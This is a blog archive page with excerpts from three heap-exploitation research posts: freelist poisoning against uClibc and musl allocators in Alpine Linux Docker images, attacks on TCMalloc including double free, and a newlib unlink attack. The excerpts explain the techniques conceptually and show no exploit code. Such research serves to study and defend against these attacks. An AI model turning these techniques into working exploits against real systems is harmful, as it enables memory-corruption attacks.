Showing posts from December, 2019

Freelist Heap Exploitation on Docker Alpine Linux Images

Introduction In this blog post, I'll look at 2 attacks on Alpine Linux distributions, which is common with Docker images. Both attacks will use freelist poisoning against the heap allocator. The difference is that the first attack will look at uClibc's heap allocator which is present in earlier releases of Alpine, and the second attack will look at the current version of Alpine, which uses musl libc. I have written at great length about freelist poisoning, as seen in: The main feature of freelist poisoning is that an attacker is able to make malloc return an arbitrary pointer. Combine

Attacks on the TCMalloc Heap Allocator

Introduction TCMalloc is a well known heap allocator. It is written by Google. A number of attacks against tcmalloc are possible. A good presentation on tcmalloc was given in 2011, In this blog post, I'll give examples of 3 attacks, some of which are not well known. Freelist Poisoning In the following code, we make tc_malloc return an arbitrary pointer. This is another variant of freelist poisoning, which I have talked about at great length. For freelist poisoning details on other allocators, see:   Double Free In the following attack that exploits a double free in tcmalloc, we convert the

Newlib Unlink Heap Exploitation

In this paper, I introduce the reader to a heap metadata corruption against the latest version of newlib. This allocator is used in embedded systems. The unlink attack on heaps was first introduced by Solar Designer in the year 2000 and was the first generic heap exploitation technique made public. The same attack is possible in modern day uClibc and the attack in newlib is almost identical. In the unlink technique, an attacker corrupts the bk and fd pointers of a free chunk. In a subsequent malloc that recycles this chunk, the chunk is unlinked from its freelist via pointer manipulations. This inadvertently allows an attacker to craft a write-what-where primitive and write what they want where they want in memory. The unlink attack name stemmed from the fact that the unlink macro is the code that performs the pointer manipulation to unlink the free chunk. This macro is unchanged in newlib and is also called unlink.   Newlib Unlink Heap Exploitation.PDF